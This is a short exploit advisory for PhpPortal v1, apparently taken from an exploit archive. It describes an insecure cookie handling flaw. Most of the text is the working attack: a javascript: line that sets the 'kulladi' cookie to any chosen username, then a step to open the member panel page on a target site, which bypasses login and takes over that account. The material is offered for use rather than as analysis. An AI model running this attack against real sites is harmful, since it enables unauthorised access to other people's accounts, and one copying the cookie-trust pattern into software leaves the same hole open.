id: 5387
date: 06/16/2009
title: phportal 1.0 Insecure Cookie Handling Vulnerability
author: KnocKout
cves: 

===================================================
phportal 1.0 Insecure Cookie Handling Vulnerability
===================================================


########################################################
PhpPortal v1 Insecure Cookie Handling Vulnerability
########################################################

Author : KnocKout
Special Thankz : CW All users
Script : http://phportal.mertindualari.com

########################################################

Exploit;

javascript:document.cookie="kulladi=[Username];path=/";
Enter..

Go To; http://target.com/uye_paneli.php?islem=bilgilerim


########################################################



#  0day.today [2023-03-23]  #